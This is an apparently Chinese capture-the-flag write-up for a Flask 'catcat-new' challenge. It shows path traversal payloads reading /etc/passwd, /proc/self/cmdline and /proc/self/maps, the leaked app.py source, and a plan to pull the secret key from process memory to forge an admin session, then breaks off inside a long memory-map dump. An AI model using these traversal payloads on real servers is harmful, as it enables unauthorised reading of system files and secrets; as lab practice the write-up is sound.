攻防世界-web-catcat-new
点开一个小猫发现URL是?file=xxx.txt,可能是任意文件读取,尝试../etc/passwd,显示文件不存在,尝试../../etc/passwd可以读取
查看进程文件proc/self/cmdline
wp在此处直接就直接利用读取当前进程的命令行参数?file=../../../proc/self/cmdline,
而我还在找flag.txt 在哪里(
发现进程中又app.py,知道其python写的,app.py这个名字大概率是用的flask框架(该文件常为flask项目的主程序)
尝试构造路径访问app.py以此来得到源码,其在../app.py
《复制文本内容,将字符串f-string格式化输出美化一下》相信你看到很多博客里是这样说的,但没有说明如何做(也有可能是我菜不知道……
补:
“将字符串f-string格式化输出美化一下” 的意思是对使用 f-string(Python 的格式化字符串语法)的代码进行格式优化和美化,使其更加易读、整洁和规范。
f-string基础用法:
1
2
3
4
5
6
7
8
| 语法:在字符串前加f或F,{}中放入需要嵌入的内容。
name = "Alice"
age = 25
info = f"姓名:{name},年龄:{age}"
print(info)
|
美化我是用的ai,实现美化的代码太长就不放了
第二种方法见补充部分
审计app.py源码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
| import os
import uuid
from flask import Flask, request, session, render_template, Markup
from cat import cat
flag = ""
app = Flask(
__name__,
static_url_path='/',
static_folder='static'
)
app.config['SECRET_KEY'] = f"{str(uuid.uuid4()).replace('-', '')}*abcdefgh"
if os.path.isfile("/flag"):
flag = cat("/flag")
os.remove("/flag")
@app.route('/', methods=['GET'])
def index():
detailtxt = os.listdir('./details/')
cats_list = [i[:i.index('.')] for i in detailtxt]
return render_template(
"index.html",
cats_list=cats_list,
cat=cat
)
@app.route('/info', methods=['GET', 'POST'])
def info():
file_param = request.args.get('file', "")
start_param = request.args.get('start', "0")
end_param = request.args.get('end', "0")
filename = f"./details/{file_param}"
name = file_param[:file_param.index('.')] if '.' in file_param else ""
return render_template(
"detail.html",
catname=name,
info=cat(filename, start_param, end_param)
)
@app.route('/admin', methods=['GET'])
def admin_can_list_root():
if session.get('admin') == 1:
return f"{flag}"
else:
session['admin'] = 0
return "NoNoNo"
if __name__ == '__main__':
app.run(
host='0.0.0.0',
debug=False,
port=5637
)
|
源代码中关于flag的就两处,一处是os.path.isfile但是其又rm掉了flag,无法利用,第二处就是’/admin’路径的session中的admin==1,就可以return flag了
易知是session伪造———flask_session的伪造需要用到session_key,session_key在源码中并未体现,其还可以通过内存数据得到,但还要先访问读取/proc/self/maps文件获取可读内容的内存映射地址,
由于/proc/self/mem内容较多而且存在不可读写部分,直接读取会导致程序崩溃
此路径在?file=../../../proc/self/maps,构造路径读取内存数据文件/proc/self/mem,根据上面读取进程的经验,此路径在?file=../../../proc/self/mem下
读取/proc/self/maps内容
1
| b'556a76191000-556a76192000 r--p 00000000 fd:00 53477819 /usr/local/bin/python3.7\n556a76192000-556a76193000 r-xp 00001000 fd:00 53477819 /usr/local/bin/python3.7\n556a76193000-556a76194000 r--p 00002000 fd:00 53477819 /usr/local/bin/python3.7\n556a76194000-556a76195000 r--p 00002000 fd:00 53477819 /usr/local/bin/python3.7\n556a76195000-556a76196000 rw-p 00003000 fd:00 53477819 /usr/local/bin/python3.7\n556a764df000-556a764e0000 ---p 00000000 00:00 0 [heap]\n556a764e0000-556a764e4000 rw-p 00000000 00:00 0 [heap]\n7fd78c6ac000-7fd78c6ae000 ---p 00000000 00:00 0 \n7fd78c6ae000-7fd78c7b7000 rw-p 00000000 00:00 0 \n7fd78c7da000-7fd78c822000 rw-p 00000000 00:00 0 \n7fd78c826000-7fd78c82a000 rw-p 00000000 00:00 0 \n7fd78c82d000-7fd78c835000 rw-p 00000000 00:00 0 \n7fd78c838000-7fd78c96a000 rw-p 00000000 00:00 0 \n7fd78c96b000-7fd78c9ee000 rw-p 00000000 00:00 0 \n7fd78c9f1000-7fd78ca35000 rw-p 00000000 00:00 0 \n7fd78ca35000-7fd78ca37000 r--p 00000000 fd:00 53478485 /usr/local/lib/python3.7/lib-dynload/_posixsubprocess.cpython-37m-x86_64-linux-gnu.so\n7fd78ca37000-7fd78ca39000 r-xp 00002000 fd:00 53478485 /usr/local/lib/python3.7/lib-dynload/_posixsubprocess.cpython-37m-x86_64-linux-gnu.so\n7fd78ca39000-7fd78ca3a000 r--p 00004000 fd:00 53478485 /usr/local/lib/python3.7/lib-dynload/_posixsubprocess.cpython-37m-x86_64-linux-gnu.so\n7fd78ca3a000-7fd78ca3b000 r--p 00004000 fd:00 53478485 /usr/local/lib/python3.7/lib-dynload/_posixsubprocess.cpython-37m-x86_64-linux-gnu.so\n7fd78ca3b000-7fd78ca3c000 rw-p 00005000 fd:00 53478485 /usr/local/lib/python3.7/lib-dynload/_posixsubprocess.cpython-37m-x86_64-linux-gnu.so\n7fd78ca3c000-7fd78ca48000 rw-p 00000000 00:00 0 \n7fd78ca4b000-7fd78cb3f000 rw-p 00000000 00:00 0 \n7fd78cb40000-7fd78cbb2000 rw-p 00000000 00:00 0 \n7fd78cbb2000-7fd78cbb8000 r--p 00000000 fd:00 53478472 /usr/local/lib/python3.7/lib-dynload/_decimal.cpython-37m-x86_64-linux-gnu.so\n7fd78cbb8000-7fd78cbef000 r-xp 00006000 fd:00 53478472 /usr/local/lib/python3.7/lib-dynload/_decimal.cpython-37m-x86_64-linux-gnu.so\n7fd78cbef000-7fd78cbfb000 r--p 0003d000 fd:00 53478472 /usr/local/lib/python3.7/lib-dynload/_decimal.cpython-37m-x86_64-linux-gnu.so\n7fd78cbfb000-7fd78cbfc000 r--p 00048000 fd:00 53478472 /usr/local/lib/python3.7/lib-dynload/_decimal.cpython-37m-x86_64-linux-gnu.so\n7fd78cbfc000-7fd78cc04000 rw-p 00049000 fd:00 53478472 /usr/local/lib/python3.7/lib-dynload/_decimal.cpython-37m-x86_64-linux-gnu.so\n7fd78cc04000-7fd78cc8f000 rw-p 00000000 00:00 0 \n7fd78cc8f000-7fd78ccdd000 rw-p 00000000 00:00 0 \n7fd78ccdd000-7fd78cce0000 r--p 00000000 fd:00 53478521 /usr/local/lib/python3.7/lib-dynload/unicodedata.cpython-37m-x86_64-linux-gnu.so\n7fd78cce0000-7fd78cce4000 r-xp 00003000 fd:00 53478521 /usr/local/lib/python3.7/lib-dynload/unicodedata.cpython-37m-x86_64-linux-gnu.so\n7fd78cce4000-7fd78cdc5000 r--p 00007000 fd:00 53478521 /usr/local/lib/python3.7/lib-dynload/unicodedata.cpython-37m-x86_64-linux-gnu.so\n7fd78cdc5000-7fd78cdc6000 r--p 000e7000 fd:00 53478521 /usr/local/lib/python3.7/lib-dynload/unicodedata.cpython-37m-x86_64-linux-gnu.so\n7fd78cdc6000-7fd78cde3000 rw-p 000e8000 fd:00 53478521 /usr/local/lib/python3.7/lib-dynload/unicodedata.cpython-37m-x86_64-linux-gnu.so\n7fd78cde3000-7fd78cdef000 rw-p 00000000 00:00 0 \n7fd78cdf0000-7fd78ce80000 rw-p 00000000 00:00 0 \n7fd78ce81000-7fd78cfad000 rw-p 00000000 00:00 0 \n7fd78cfad000-7fd78cfc9000 r--p 00000000 fd:00 53348202 /lib/libssl.so.1.1\n7fd78cfc9000-7fd78d009000 r-xp 0001c000 fd:00 53348202 /lib/libssl.so.1.1\n7fd78d009000-7fd78d021000 r--p 0005c000 fd:00 53348202 /lib/libssl.so.1.1\n7fd78d021000-7fd78d02a000 r--p 00073000 fd:00 53348202 /lib/libssl.so.1.1\n7fd78d02a000-7fd78d02e000 rw-p 0007c000 fd:00 53348202 /lib/libssl.so.1.1\n7fd78d02e000-7fd78d1ff000 rw-p 00000000 00:00 0 \n7fd78d200000-7fd78d27d000 rw-p 00000000 00:00 0 \n7fd78d27e000-7fd78d291000 rw-p 00000000 00:00 0 \n7fd78d291000-7fd78d293000 r--p 00000000 fd:00 53478505 /usr/local/lib/python3.7/lib-dynload/binascii.cpython-37m-x86_64-linux-gnu.so\n7fd78d293000-7fd78d297000 r-xp 00002000 fd:00 53478505 /usr/local/lib/python3.7/lib-dynload/binascii.cpython-37m-x86_64-linux-gnu.so\n7fd78d297000-7fd78d299000 r--p 00006000 fd:00 53478505 /usr/local/lib/python3.7/lib-dynload/binascii.cpython-37m-x86_64-linux-gnu.so\n7fd78d299000-7fd78d29a000 r--p 00007000 fd:00 53478505 /usr/local/lib/python3.7/lib-dynload/binascii.cpython-37m-x86_64-linux-gnu.so\n7fd78d29a000-7fd78d29b000 rw-p 00008000 fd:00 53478505 /usr/local/lib/python3.7/lib-dynload/binascii.cpython-37m-x86_64-linux-gnu.so\n7fd78d29b000-7fd78d2a0000 rw-p 00000000 00:00 0 \n7fd78d2a0000-7fd78d2a5000 r--p 00000000 fd:00 53478470 /usr/local/lib/python3.7/lib-dynload/_datetime.cpython-37m-x86_64-linux-gnu.so\n7fd78d2a5000-7fd78d2b0000 r-xp 00005000 fd:00 53478470 /usr/local/lib/python3.7/lib-dynload/_datetime.cpython-37m-x86_64-linux-gnu.so\n7fd78d2b0000-7fd78d2b5000 r--p 00010000 fd:00 53478470 /usr/local/lib/python3.7/lib-dynload/_datetime.cpython-37m-x86_64-linux-gnu.so\n7fd78d2b5000-7fd78d2b6000 r--p 00014000 fd:00 53478470 /usr/local/lib/python3.7/lib-dynload/_datetime.cpython-37m-x86_64-linux-gnu.so\n7fd78d2b6000-7fd78d2b8000 rw-p 00015000 fd:00 53478470 /usr/local/lib/python3.7/lib-dynload/_datetime.cpython-37m-x86_64-linux-gnu.so\n7fd78d2b8000-7fd78d326000 rw-p 00000000 00:00 0 \n7fd78d326000-7fd78d328000 r--p 00000000 fd:00 53478517 /usr/local/lib/python3.7/lib-dynload/select.cpython-37m-x86_64-linux-gnu.so\n7fd78d328000-7fd78d32c000 r-xp 00002000 fd:00 53478517 /usr/local/lib/python3.7/lib-dynload/select.cpython-37m-x86_64-linux-gnu.so\n7fd78d32c000-7fd78d32d000 r--p 00006000 fd:00 53478517 /usr/local/lib/python3.7/lib-dynload/select.cpython-37m-x86_64-linux-gnu.so\n7fd78d32d000-7fd78d32e000 r--p 00006000 fd:00 53478517 /usr/local/lib/python3.7/lib-dynload/select.cpython-37m-x86_64-linux-gnu.so\n7fd78d32e000-7fd78d330000 rw-p 00007000 fd:00 53478517 /usr/local/lib/python3.7/lib-dynload/select.cpython-37m-x86_64-linux-gnu.so\n7fd78d330000-7fd78d33a000 rw-p 00000000 00:00 0 \n7fd78d33a000-7fd78d33e000 r--p 00000000 fd:00 53478492 /usr/local/lib/python3.7/lib-dynload/_socket.cpython-37m-x86_64-linux-gnu.so\n7fd78d33e000-7fd78d347000 r-xp 00004000 fd:00 53478492 /usr/local/lib/python3.7/lib-dynload/_socket.cpython-37m-x86_64-linux-gnu.so\n7fd78d347000-7fd78d34b000 r--p 0000d000 fd:00 53478492 /usr/local/lib/python3.7/lib-dynload/_socket.cpython-37m-x86_64-linux-gnu.so\n7fd78d34b000-7fd78d34c000 r--p 00011000 fd:00 53478492 /usr/local/lib/python3.7/lib-dynload/_socket.cpython-37m-x86_64-linux-gnu.so\n7fd78d34c000-7fd78d34d000 r--p 00011000 fd:00 53478492 /usr/local/lib/python3.7/lib-dynload/_socket.cpython-37m-x86_64-linux-gnu.so\n7fd78d34d000-7fd78d352000 rw-p 00012000 fd:00 53478492 /usr/local/lib/python3.7/lib-dynload/_socket.cpython-37m-x86_64-linux-gnu.so\n7fd78d352000-7fd78d357000 rw-p 00000000 00:00 0 \n7fd78d358000-7fd78d361000 rw-p 00000000 00:00 0 \n7fd78d361000-7fd78d362000 r--p 00000000 fd:00 53478463 /usr/local/lib/python3.7/lib-dynload/_contextvars.cpython-37m-x86_64-linux-gnu.so\n7fd78d362000-7fd78d363000 r-xp 00001000 fd:00 53478463 /usr/local/lib/python3.7/lib-dynload/_contextvars.cpython-37m-x86_64-linux-gnu.so\n7fd78d363000-7fd78d364000 r--p 00002000 fd:00 53478463 /usr/local/lib/python3.7/lib-dynload/_contextvars.cpython-37m-x86_64-linux-gnu.so\n7fd78d364000-7fd78d365000 r--p 00002000 fd:00 53478463 /usr/local/lib/python3.7/lib-dynload/_contextvars.cpython-37m-x86_64-linux-gnu.so\n7fd78d365000-7fd78d366000 rw-p 00003000 fd:00 53478463 /usr/local/lib/python3.7/lib-dynload/_contextvars.cpython-37m-x86_64-linux-gnu.so\n7fd78d366000-7fd78d3e6000 rw-p 00000000 00:00 0 \n7fd78d3e7000-7fd78d43f000 rw-p 00000000 00:00 0 \n7fd78d440000-7fd78d5d4000 rw-p 00000000 00:00 0 \n7fd78d5d4000-7fd78d5d5000 r--p 00000000 fd:00 53478483 /usr/local/lib/python3.7/lib-dynload/_opcode.cpython-37m-x86_64-linux-gnu.so\n7fd78d5d5000-7fd78d5d6000 r-xp 00001000 fd:00 53478483 /usr/local/lib/python3.7/lib-dynload/_opcode.cpython-37m-x86_64-linux-gnu.so\n7fd78d5d6000-7fd78d5d7000 r--p 00002000 fd:00 53478483 /usr/local/lib/python3.7/lib-dynload/_opcode.cpython-37m-x86_64-linux-gnu.so\n7fd78d5d7000-7fd78d5d8000 r--p 00002000 fd:00 53478483 /usr/local/lib/python3.7/lib-dynload/_opcode.cpython-37m-x86_64-linux-gnu.so\n7fd78d5d8000-7fd78d5d9000 rw-p 00003000 fd:00 53478483 /usr/local/lib/python3.7/lib-dynload/_opcode.cpython-37m-x86_64-linux-gnu.so\n7fd78d5d9000-7fd78d630000 rw-p 00000000 00:00 0 \n7fd78d630000-7fd78d631000 r--p 00000000 fd:00 53478487 /usr/local/lib/python3.7/lib-dynload/_random.cpython-37m-x86_64-linux-gnu.so\n7fd78d631000-7fd78d634000 r-xp 00001000 fd:00 53478487 /usr/local/lib/python3.7/lib-dynload/_random.cpython-37m-x86_64-linux-gnu.so\n7fd78d634000-7fd78d635000 r--p 00004000 fd:00 53478487 /usr/local/lib/python3.7/lib-dynload/_random.cpython-37m-x86_64-linux-gnu.so\n7fd78d635000-7fd78d636000 r--p 00004000 fd:00 53478487 /usr/local/lib/python3.7/lib-dynload/_random.cpython-37m-x86_64-linux-gnu.so\n7fd78d636000-7fd78d637000 rw-p 00005000 fd:00 53478487 /usr/local/lib/python3.7/lib-dynload/_random.cpython-37m-x86_64-linux-gnu.so\n7fd78d637000-7fd78d638000 r--p 00000000 fd:00 53478454 /usr/local/lib/python3.7/lib-dynload/_bisect.cpython-37m-x86_64-linux-gnu.so\n7fd78d638000-7fd78d639000 r-xp 00001000 fd:00 53478454 /usr/local/lib/python3.7/lib-dynload/_bisect.cpython-37m-x86_64-linux-gnu.so\n7fd78d639000-7fd78d63a000 r--p 00002000 fd:00 53478454 /usr/local/lib/python3.7/lib-dynload/_bisect.cpython-37m-x86_64-linux-gnu.so\n7fd78d63a000-7fd78d63b000 r--p 00002000 fd:00 53478454 /usr/local/lib/python3.7/lib-dynload/_bisect.cpython-37m-x86_64-linux-gnu.so\n7fd78d63b000-7fd78d63c000 rw-p 00003000 fd:00 53478454 /usr/local/lib/python3.7/lib-dynload/_bisect.cpython-37m-x86_64-linux-gnu.so\n7fd78d63c000-7fd78d63e000 r--p 00000000 fd:00 53478490 /usr/local/lib/python3.7/lib-dynload/_sha3.cpython-37m-x86_64-linux-gnu.so\n7fd78d63e000-7fd78d652000 r-xp 00002000 fd:00 53478490 /usr/local/lib/python3.7/lib-dynload/_sha3.cpython-37m-x86_64-linux-gnu.so\n7fd78d652000-7fd78d653000 r--p 00016000 fd:00 53478490 /usr/local/lib/python3.7/lib-dynload/_sha3.cpython-37m-x86_64-linux-gnu.so\n7fd78d653000-7fd78d654000 r--p 00017000 fd:00 53478490 /usr/local/lib/python3.7/lib-dynload/_sha3.cpython-37m-x86_64-linux-gnu.so\n7fd78d654000-7fd78d655000 r--p 00017000 fd:00 53478490 /usr/local/lib/python3.7/lib-dynload/_sha3.cpython-37m-x86_64-linux-gnu.so\n7fd78d655000-7fd78d657000 rw-p 00018000 fd:00 53478490 /usr/local/lib/python3.7/lib-dynload/_sha3.cpython-37m-x86_64-linux-gnu.so\n7fd78d657000-7fd78d659000 r--p 00000000 fd:00 53478455 /usr/local/lib/python3.7/lib-dynload/_blake2.cpython-37m-x86_64-linux-gnu.so\n7fd78d659000-7fd78d660000 r-xp 00002000 fd:00 53478455 /usr/local/lib/python3.7/lib-dynload/_blake2.cpython-37m-x86_64-linux-gnu.so\n7fd78d660000-7fd78d661000 r--p 00009000 fd:00 53478455 /usr/local/lib/python3.7/lib-dynload/_blake2.cpython-37m-x86_64-linux-gnu.so\n7fd78d661000-7fd78d662000 r--p 0000a000 fd:00 53478455 /usr/local/lib/python3.7/lib-dynload/_blake2.cpython-37m-x86_64-linux-gnu.so\n7fd78d662000-7fd78d663000 r--p 0000a000 fd:00 53478455 /usr/local/lib/python3.7/lib-dynload/_blake2.cpython-37m-x86_64-linux-gnu.so\n7fd78d663000-7fd78d664000 rw-p 0000b000 fd:00 53478455 /usr/local/lib/python3.7/lib-dynload/_blake2.cpython-37m-x86_64-linux-gnu.so\n7fd78d664000-7fd78d6d9000 r--p 00000000 fd:00 53348201 /lib/libcrypto.so.1.1\n7fd78d6d9000-7fd78d830000 r-xp 00075000 fd:00 53348201 /lib/libcrypto.so.1.1\n7fd78d830000-7fd78d8b4000 r--p 001cc000 fd:00 53348201 /lib/libcrypto.so.1.1\n7fd78d8b4000-7fd78d8df000 r--p 0024f000 fd:00 53348201 /lib/libcrypto.so.1.1\n7fd78d8df000-7fd78d8e1000 rw-p 0027a000 fd:00 53348201 /lib/libcrypto.so.1.1\n7fd78d8e1000-7fd78d8e5000 rw-p 00000000 00:00 0 \n7fd78d8e5000-7fd78d8e7000 r--p 00000000 fd:00 53478475 /usr/local/lib/python3.7/lib-dynload/_hashlib.cpython-37m-x86_64-linux-gnu.so\n7fd78d8e7000-7fd78d8eb000 r-xp 00002000 fd:00 53478475 /usr/local/lib/python3.7/lib-dynload/_hashlib.cpython-37m-x86_64-linux-gnu.so\n7fd78d8eb000-7fd78d8ec000 r--p 00006000 fd:00 53478475 /usr/local/lib/python3.7/lib-dynload/_hashlib.cpython-37m-x86_64-linux-gnu.so\n7fd78d8ec000-7fd78d8ed000 r--p 00007000 fd:00 53478475 /usr/local/lib/python3.7/lib-dynload/_hashlib.cpython-37m-x86_64-linux-gnu.so\n7fd78d8ed000-7fd78d8ee000 r--p 00007000 fd:00 53478475 /usr/local/lib/python3.7/lib-dynload/_hashlib.cpython-37m-x86_64-linux-gnu.so\n7fd78d8ee000-7fd78d8ef000 rw-p 00008000 fd:00 53478475 /usr/local/lib/python3.7/lib-dynload/_hashlib.cpython-37m-x86_64-linux-gnu.so\n7fd78d8ef000-7fd78d8f2000 r--p 00000000 fd:00 53478509 /usr/local/lib/python3.7/lib-dynload/math.cpython-37m-x86_64-linux-gnu.so\n7fd78d8f2000-7fd78d8fa000 r-xp 00003000 fd:00 53478509 /usr/local/lib/python3.7/lib-dynload/math.cpython-37m-x86_64-linux-gnu.so\n7fd78d8fa000-7fd78d8fc000 r--p 0000b000 fd:00 53478509 /usr/local/lib/python3.7/lib-dynload/math.cpython-37m-x86_64-linux-gnu.so\n7fd78d8fc000-7fd78d8fd000 r--p 0000c000 fd:00 53478509 /usr/local/lib/python3.7/lib-dynload/math.cpython-37m-x86_64-linux-gnu.so\n7fd78d8fd000-7fd78d8ff000 rw-p 0000d000 fd:00 53478509 /usr/local/lib/python3.7/lib-dynload/math.cpython-37m-x86_64-linux-gnu.so\n7fd78d8ff000-7fd78d902000 r--p 00000000 fd:00 53477792 /usr/lib/liblzma.so.5.2.5\n7fd78d902000-7fd78d915000 r-xp 00003000 fd:00 53477792 /usr/lib/liblzma.so.5.2.5\n7fd78d915000-7fd78d920000 r--p 00016000 fd:00 53477792 /usr/lib/liblzma.so.5.2.5\n7fd78d920000-7fd78d921000 r--p 00020000 fd:00 53477792 /usr/lib/liblzma.so.5.2.5\n7fd78d921000-7fd78d922000 rw-p 00021000 fd:00 53477792 /usr/lib/liblzma.so.5.2.5\n7fd78d922000-7fd78d924000 r--p 00000000 fd:00 53477758 /usr/lib/libbz2.so.1.0.8\n7fd78d924000-7fd78d92d000 r-xp 00002000 fd:00 53477758 /usr/lib/libbz2.so.1.0.8\n7fd78d92d000-7fd78d92f000 r--p 0000b000 fd:00 53477758 /usr/lib/libbz2.so.1.0.8\n7fd78d92f000-7fd78d930000 r--p 0000c000 fd:00 53477758 /usr/lib/libbz2.so.1.0.8\n7fd78d930000-7fd78d931000 rw-p 0000d000 fd:00 53477758 /usr/lib/libbz2.so.1.0.8\n7fd78d931000-7fd78d971000 rw-p 00000000 00:00 0 \n7fd78d972000-7fd78d994000 rw-p 00000000 00:00 0 \n7fd78d995000-7fd78d99b000 rw-p 00000000 00:00 0 \n7fd78d99b000-7fd78d9a4000 r--p 00000000 fd:00 53478494 /usr/local/lib/python3.7/lib-dynload/_ssl.cpython-37m-x86_64-linux-gnu.so\n7fd78d9a4000-7fd78d9ad000 r-xp 00009000 fd:00 53478494 /usr/local/lib/python3.7/lib-dynload/_ssl.cpython-37m-x86_64-linux-gnu.so\n7fd78d9ad000-7fd78d9b3000 r--p 00012000 fd:00 53478494 /usr/local/lib/python3.7/lib-dynload/_ssl.cpython-37m-x86_64-linux-gnu.so\n7fd78d9b3000-7fd78d9b4000 r--p 00018000 fd:00 53478494 /usr/local/lib/python3.7/lib-dynload/_ssl.cpython-37m-x86_64-linux-gnu.so\n7fd78d9b4000-7fd78d9b5000 r--p 00018000 fd:00 53478494 /usr/local/lib/python3.7/lib-dynload/_ssl.cpython-37m-x86_64-linux-gnu.so\n7fd78d9b5000-7fd78d9ba000 rw-p 00019000 fd:00 53478494 /usr/local/lib/python3.7/lib-dynload/_ssl.cpython-37m-x86_64-linux-gnu.so\n7fd78d9ba000-7fd78d9be000 rw-p 00000000 00:00 0 \n7fd78d9be000-7fd78d9bf000 r--p 00000000 fd:00 53478508 /usr/local/lib/python3.7/lib-dynload/grp.cpython-37m-x86_64-linux-gnu.so\n7fd78d9bf000-7fd78d9c0000 r-xp 00001000 fd:00 53478508 /usr/local/lib/python3.7/lib-dynload/grp.cpython-37m-x86_64-linux-gnu.so\n7fd78d9c0000-7fd78d9c1000 r--p 00002000 fd:00 53478508 /usr/local/lib/python3.7/lib-dynload/grp.cpython-37m-x86_64-linux-gnu.so\n7fd78d9c1000-7fd78d9c2000 r--p 00002000 fd:00 53478508 /usr/local/lib/python3.7/lib-dynload/grp.cpython-37m-x86_64-linux-gnu.so\n7fd78d9c2000-7fd78d9c3000 rw-p 00003000 fd:00 53478508 /usr/local/lib/python3.7/lib-dynload/grp.cpython-37m-x86_64-linux-gnu.so\n7fd78d9c3000-7fd78da10000 rw-p 00000000 00:00 0 \n7fd78da10000-7fd78da13000 r--p 00000000 fd:00 53348204 /lib/libz.so.1.2.11\n7fd78da13000-7fd78da21000 r-xp 00003000 fd:00 53348204 /lib/libz.so.1.2.11\n7fd78da21000-7fd78da28000 r--p 00011000 fd:00 53348204 /lib/libz.so.1.2.11\n7fd78da28000-7fd78da29000 r--p 00017000 fd:00 53348204 /lib/libz.so.1.2.11\n7fd78da29000-7fd78da2a000 rw-p 00018000 fd:00 53348204 /lib/libz.so.1.2.11\n7fd78da2a000-7fd78da2c000 r--p 00000000 fd:00 53478523 /usr/local/lib/python3.7/lib-dynload/zlib.cpython-37m-x86_64-linux-gnu.so\n7fd78da2c000-7fd78da2f000 r-xp 00002000 fd:00 53478523 /usr/local/lib/python3.7/lib-dynload/zlib.cpython-37m-x86_64-linux-gnu.so\n7fd78da2f000-7fd78da30000 r--p 00005000 fd:00 53478523 /usr/local/lib/python3.7/lib-dynload/zlib.cpython-37m-x86_64-linux-gnu.so\n7fd78da30000-7fd78da31000 r--p 00006000 fd:00 53478523 /usr/local/lib/python3.7/lib-dynload/zlib.cpython-37m-x86_64-linux-gnu.so\n7fd78da31000-7fd78da32000 r--p 00006000 fd:00 53478523 /usr/local/lib/python3.7/lib-dynload/zlib.cpython-37m-x86_64-linux-gnu.so\n7fd78da32000-7fd78da34000 rw-p 00007000 fd:00 53478523 /usr/local/lib/python3.7/lib-dynload/zlib.cpython-37m-x86_64-linux-gnu.so\n7fd78da34000-7fd78da38000 r--p 00000000 fd:00 53478484 /usr/local/lib/python3.7/lib-dynload/_pickle.cpython-37m-x86_64-linux-gnu.so\n7fd78da38000-7fd78da4d000 r-xp 00004000 fd:00 53478484 /usr/local/lib/python3.7/lib-dynload/_pickle.cpython-37m-x86_64-linux-gnu.so\n7fd78da4d000-7fd78da51000 r--p 00019000 fd:00 53478484 /usr/local/lib/python3.7/lib-dynload/_pickle.cpython-37m-x86_64-linux-gnu.so\n7fd78da51000-7fd78da52000 r--p 0001d000 fd:00 53478484 /usr/local/lib/python3.7/lib-dynload/_pickle.cpython-37m-x86_64-linux-gnu.so\n7fd78da52000-7fd78da53000 r--p 0001d000 fd:00 53478484 /usr/local/lib/python3.7/lib-dynload/_pickle.cpython-37m-x86_64-linux-gnu.so\n7fd78da53000-7fd78da56000 rw-p 0001e000 fd:00 53478484 /usr/local/lib/python3.7/lib-dynload/_pickle.cpython-37m-x86_64-linux-gnu.so\n7fd78da56000-7fd78da5e000 rw-p 00000000 00:00 0 \n7fd78da5e000-7fd78da61000 r--p 00000000 fd:00 53478495 /usr/local/lib/python3.7/lib-dynload/_struct.cpython-37m-x86_64-linux-gnu.so\n7fd78da61000-7fd78da67000 r-xp 00003000 fd:00 53478495 /usr/local/lib/python3.7/lib-dynload/_struct.cpython-37m-x86_64-linux-gnu.so\n7fd78da67000-7fd78da69000 r--p 00009000 fd:00 53478495 /usr/local/lib/python3.7/lib-dynload/_struct.cpython-37m-x86_64-linux-gnu.so\n7fd78da69000-7fd78da6a000 r--p 0000b000 fd:00 53478495 /usr/local/lib/python3.7/lib-dynload/_struct.cpython-37m-x86_64-linux-gnu.so\n7fd78da6a000-7fd78da6b000 r--p 0000b000 fd:00 53478495 /usr/local/lib/python3.7/lib-dynload/_struct.cpython-37m-x86_64-linux-gnu.so\n7fd78da6b000-7fd78da6d000 rw-p 0000c000 fd:00 53478495 /usr/local/lib/python3.7/lib-dynload/_struct.cpython-37m-x86_64-linux-gnu.so\n7fd78da6d000-7fd78dac8000 rw-p 00000000 00:00 0 \n7fd78dac8000-7fd78daca000 r--p 00000000 fd:00 53478477 /usr/local/lib/python3.7/lib-dynload/_json.cpython-37m-x86_64-linux-gnu.so\n7fd78daca000-7fd78dad1000 r-xp 00002000 fd:00 53478477 /usr/local/lib/python3.7/lib-dynload/_json.cpython-37m-x86_64-linux-gnu.so\n7fd78dad1000-7fd78dad3000 r--p 00009000 fd:00 53478477 /usr/local/lib/python3.7/lib-dynload/_json.cpython-37m-x86_64-linux-gnu.so\n7fd78dad3000-7fd78dad4000 r--p 0000a000 fd:00 53478477 /usr/local/lib/python3.7/lib-dynload/_json.cpython-37m-x86_64-linux-gnu.so\n7fd78dad4000-7fd78dad5000 rw-p 0000b000 fd:00 53478477 /usr/local/lib/python3.7/lib-dynload/_json.cpython-37m-x86_64-linux-gnu.so\n7fd78dad5000-7fd78dae0000 rw-p 00000000 00:00 0 \n7fd78dae0000-7fd78dae1000 r--p 00000000 fd:00 53480307 /usr/local/lib/python3.7/site-packages/markupsafe/_speedups.cpython-37m-x86_64-linux-gnu.so\n7fd78dae1000-7fd78dae2000 r-xp 00001000 fd:00 53480307 /usr/local/lib/python3.7/site-packages/markupsafe/_speedups.cpython-37m-x86_64-linux-gnu.so\n7fd78dae2000-7fd78dae3000 r--p 00002000 fd:00 53480307 /usr/local/lib/python3.7/site-packages/markupsafe/_speedups.cpython-37m-x86_64-linux-gnu.so\n7fd78dae3000-7fd78dae4000 r--p 00002000 fd:00 53480307 /usr/local/lib/python3.7/site-packages/markupsafe/_speedups.cpython-37m-x86_64-linux-gnu.so\n7fd78dae4000-7fd78dae5000 rw-p 00003000 fd:00 53480307 /usr/local/lib/python3.7/site-packages/markupsafe/_speedups.cpython-37m-x86_64-linux-gnu.so\n7fd78dae5000-7fd78dc44000 rw-p 00000000 00:00 0 \n7fd78dc44000-7fd78dc45000 r--p 00000000 fd:00 53478476 /usr/local/lib/python3.7/lib-dynload/_heapq.cpython-37m-x86_64-linux-gnu.so\n7fd78dc45000-7fd78dc46000 r-xp 00001000 fd:00 53478476 /usr/local/lib/python3.7/lib-dynload/_heapq.cpython-37m-x86_64-linux-gnu.so\n7fd78dc46000-7fd78dc47000 r--p 00002000 fd:00 53478476 /usr/local/lib/python3.7/lib-dynload/_heapq.cpython-37m-x86_64-linux-gnu.so\n7fd78dc47000-7fd78dc48000 r--p 00002000 fd:00 53478476 /usr/local/lib/python3.7/lib-dynload/_heapq.cpython-37m-x86_64-linux-gnu.so\n7fd78dc48000-7fd78dc4a000 rw-p 00003000 fd:00 53478476 /usr/local/lib/python3.7/lib-dynload/_heapq.cpython-37m-x86_64-linux-gnu.so\n7fd78dc4a000-7fd78dc4d000 rw-p 00000000 00:00 0 \n7fd78dc4d000-7fd78dc4f000 r--p 00000000 fd:00 53477652 /lib/libuuid.so.1.3.0\n7fd78dc4f000-7fd78dc53000 r-xp 00002000 fd:00 53477652 /lib/libuuid.so.1.3.0\n7fd78dc53000-7fd78dc54000 r--p 00006000 fd:00 53477652 /lib/libuuid.so.1.3.0\n7fd78dc54000-7fd78dc55000 r--p 00006000 fd:00 53477652 /lib/libuuid.so.1.3.0\n7fd78dc55000-7fd78dc56000 rw-p 00007000 fd:00 53477652 /lib/libuuid.so.1.3.0\n7fd78dc56000-7fd78dc57000 r--p 00000000 fd:00 53478501 